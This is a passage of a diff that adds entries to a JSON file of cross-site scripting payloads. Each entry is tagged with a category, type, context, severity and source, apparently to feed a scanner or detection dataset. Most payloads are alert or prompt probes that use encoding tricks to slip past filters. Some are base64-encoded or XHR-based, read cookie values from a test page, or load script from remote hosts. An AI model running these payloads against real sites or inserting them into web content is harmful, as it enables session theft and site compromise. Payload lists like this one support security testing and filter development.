"metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>", + "category": "xss", + "metadata": { + "type": "data_uri", + "context": "html", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<a target=\"x\" href=\"xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E", + "category": "xss", + "metadata": { + "type": "data_uri", + "context": "attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<a target=\"x\" href=\"xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<a target=\"x\" href=\"xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<a target=\"x\" href=\"xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<a href=\"javascript&colon;\\u0061&#x6C;&#101%72t&lpar;1&rpar;\"><button>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<div onmouseover='alert&lpar;1&rpar;'>DIV</div>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "event_attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<iframe style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\">", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "style", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<a href=\"jAvAsCrIpT&colon;alert&lpar;1&rpar;\">X</a>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<embed src=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\"> ?", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<object data=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\">?", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<var onmouseover=\"prompt(1)\">On Mouse Over</var>?", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<img src=\"/\" =_=\" title=\"onerror='prompt(1)'\">", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<%<!--'%><script>alert(1);</script -->", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script src=\"data:text/javascript,alert(1)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<iframe/src \\/\\/onload = prompt(1)", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "event_attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<iframe/onreadystatechange=alert(1)", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "event_attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<svg/onload=alert(1)", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "event_attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<input value=<><iframe/src=javascript:confirm(1)", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<input type=\"text\" value=``<div/onmouseover='alert(1)'>X</div>", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "event_attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "http://www.<script>alert(1)</script .com", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ?", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<svg><script ?>alert(1)", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<img src=`xx:xx`onerror=alert(1)>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<object type=\"text/x-scriptlet\" data=\"http://jsfiddle.net/XLE63/ \"></object>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<meta http-equiv=\"refresh\" content=\"0;javascript&colon;alert(1)\"/>?", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<math><a xlink:href=\"//jsfiddle.net/t846h/\">click", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<embed code=\"http://businessinfo.co.uk/labs/xss/xss.swf\" allowscriptaccess=always>?", + "category": "xss", + "metadata": { + "type": "generic", + "context": "html", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<svg contentScriptType=text/vbs><script>MsgBox+1", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<a href=\"data:text/html;base64_,<svg/onload=\\u0061&#x6C;&#101%72t(1)>\">X</a", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "attribute", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<iframe/onreadystatechange=\\u0061\\u006C\\u0065\\u0072\\u0074('\\u0061') worksinIE>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "event_attribute", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script/src=\"data&colon;text%2Fj\\u0061v\\u0061script,\\u0061lert('\\u0061')\"></script a=\\u0061 & /=%2F", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script/src=data&colon;text/j\\u0061v\\u0061&#115&#99&#114&#105&#112&#116,\\u0061%6C%65%72%74(/XSS/)></script ????????????", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<object data=javascript&colon;\\u0061&#x6C;&#101%72t(1)>", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script>+-+-1-+-+alert(1)</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<body/onload=&lt;!--&gt;&#10alert(1)>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "event_attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script itworksinallbrowsers>/*<script* */alert(1)</script ?", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<img src ?itworksonchrome?\\/onerror = alert(1)???", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "event_attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<svg><script>//&NewLine;confirm(1);</script </svg>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<svg><script onlypossibleinopera:-)> alert(1)", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe", + "category": "xss", + "metadata": { + "type": "generic", + "context": "attribute", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script x> alert(1) </script 1=2", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "script_tag", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<div/onmouseover='alert(1)'> style=\"x:\">", + "category": "xss", + "metadata": { + "type": "html_element", + "context": "style", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<--`<img/src=` onerror=alert(1)> --!>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ?", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<div style=\"position:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\" onclick=\"alert(1)\">x</button>?", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "style", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "\"><img src=x onerror=window.open('https://www.google.com/');>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<form><button formaction=javascript&colon;alert(1)>CLICKME", + "category": "xss", + "metadata": { + "type": "generic", + "context": "event_attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?", + "category": "xss", + "metadata": { + "type": "data_uri", + "context": "html", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<iframe src=\"data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\"></iframe>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "attribute", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<a href=\"data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203\">Click Me</a>", + "category": "xss", + "metadata": { + "type": "data_uri", + "context": "attribute", + "severity": "medium", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "\"><img src=x onerror=prompt(1);>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "JHADDIX_XSS" + } + }, + { + "payload": "<script\\x20type=\"text/javascript\">javascript:alert(9535);</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script\\x3Etype=\"text/javascript\">javascript:alert(7743);</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script\\x0Dtype=\"text/javascript\">javascript:alert(7178);</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script\\x09type=\"text/javascript\">javascript:alert(7449);</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script\\x0Ctype=\"text/javascript\">javascript:alert(8711);</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script\\x2Ftype=\"text/javascript\">javascript:alert(9847);</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script\\x0Atype=\"text/javascript\">javascript:alert(3663);</script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "'`\"><\\x3Cscript>javascript:alert(5917)</script>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "'`\"><\\x00script>javascript:alert(1598)</script>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<img src=1 href=1 onerror=\"javascript:alert(4971)\"></img>", + "category": "xss", + "metadata": { + "type": "img_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<audio src=1 href=1 onerror=\"javascript:alert(5920)\"></audio>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<video src=1 href=1 onerror=\"javascript:alert(8771)\"></video>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<body src=1 href=1 onerror=\"javascript:alert(7447)\"></body>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<image src=1 href=1 onerror=\"javascript:alert(3089)\"></image>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<object src=1 href=1 onerror=\"javascript:alert(6149)\"></object>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script src=1 href=1 onerror=\"javascript:alert(9446)\"></script>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "attribute", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<svg onResize svg onResize=\"javascript:javascript:alert(1225)\"></svg onResize>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<title onPropertyChange title onPropertyChange=\"javascript:javascript:alert(5255)\"></title onPropertyChange>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<iframe onLoad iframe onLoad=\"javascript:javascript:alert(6800)\"></iframe onLoad>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<body onMouseEnter body onMouseEnter=\"javascript:javascript:alert(0431)\"></body onMouseEnter>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<body onFocus body onFocus=\"javascript:javascript:alert(4350)\"></body onFocus>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<frameset onScroll frameset onScroll=\"javascript:javascript:alert(6374)\"></frameset onScroll>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script onReadyStateChange script onReadyStateChange=\"javascript:javascript:alert(1921)\"></script onReadyStateChange>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<html onMouseUp html onMouseUp=\"javascript:javascript:alert(7709)\"></html onMouseUp>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<body onPropertyChange body onPropertyChange=\"javascript:javascript:alert(8426)\"></body onPropertyChange>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<svg onLoad svg onLoad=\"javascript:javascript:alert(4906)\"></svg onLoad>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<body onPageHide body onPageHide=\"javascript:javascript:alert(0224)\"></body onPageHide>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<body onMouseOver body onMouseOver=\"javascript:javascript:alert(0687)\"></body onMouseOver>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<body onUnload body onUnload=\"javascript:javascript:alert(9420)\"></body onUnload>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<body onLoad body onLoad=\"javascript:javascript:alert(4710)\"></body onLoad>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<bgsound onPropertyChange bgsound onPropertyChange=\"javascript:javascript:alert(1517)\"></bgsound onPropertyChange>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<html onMouseLeave html onMouseLeave=\"javascript:javascript:alert(9734)\"></html onMouseLeave>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<html onMouseWheel html onMouseWheel=\"javascript:javascript:alert(2408)\"></html onMouseWheel>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<style onLoad style onLoad=\"javascript:javascript:alert(0828)\"></style onLoad>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<iframe onReadyStateChange iframe onReadyStateChange=\"javascript:javascript:alert(2236)\"></iframe onReadyStateChange>", + "category": "xss", + "metadata": { + "type": "iframe", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<body onPageShow body onPageShow=\"javascript:javascript:alert(5797)\"></body onPageShow>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<style onReadyStateChange style onReadyStateChange=\"javascript:javascript:alert(9596)\"></style onReadyStateChange>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<frameset onFocus frameset onFocus=\"javascript:javascript:alert(8187)\"></frameset onFocus>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<applet onError applet onError=\"javascript:javascript:alert(9815)\"></applet onError>", + "category": "xss", + "metadata": { + "type": "event_handler", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<marquee onStart marquee onStart=\"javascript:javascript:alert(9723)\"></marquee onStart>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<script onLoad script onLoad=\"javascript:javascript:alert(8494)\"></script onLoad>", + "category": "xss", + "metadata": { + "type": "script_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<html onMouseOver html onMouseOver=\"javascript:javascript:alert(4318)\"></html onMouseOver>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<html onMouseEnter html onMouseEnter=\"javascript:parent.javascript:alert(3087)\"></html onMouseEnter>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<body onBeforeUnload body onBeforeUnload=\"javascript:javascript:alert(1781)\"></body onBeforeUnload>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<html onMouseDown html onMouseDown=\"javascript:javascript:alert(7974)\"></html onMouseDown>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<marquee onScroll marquee onScroll=\"javascript:javascript:alert(3573)\"></marquee onScroll>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<xml onPropertyChange xml onPropertyChange=\"javascript:javascript:alert(4387)\"></xml onPropertyChange>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<frameset onBlur frameset onBlur=\"javascript:javascript:alert(4750)\"></frameset onBlur>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<applet onReadyStateChange applet onReadyStateChange=\"javascript:javascript:alert(1103)\"></applet onReadyStateChange>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<svg onUnload svg onUnload=\"javascript:javascript:alert(8161)\"></svg onUnload>", + "category": "xss", + "metadata": { + "type": "svg_tag", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<html onMouseOut html onMouseOut=\"javascript:javascript:alert(9460)\"></html onMouseOut>", + "category": "xss", + "metadata": { + "type": "javascript_uri", + "context": "href", + "severity": "high", + "source": "xss_alert_identifiable" + } + }, + { + "payload": "<body onMouseMove body onMouseMove=\"javascript:javascript:alert(9588)\"></body onMouseMove>", + "category": "xss", + "metadata": 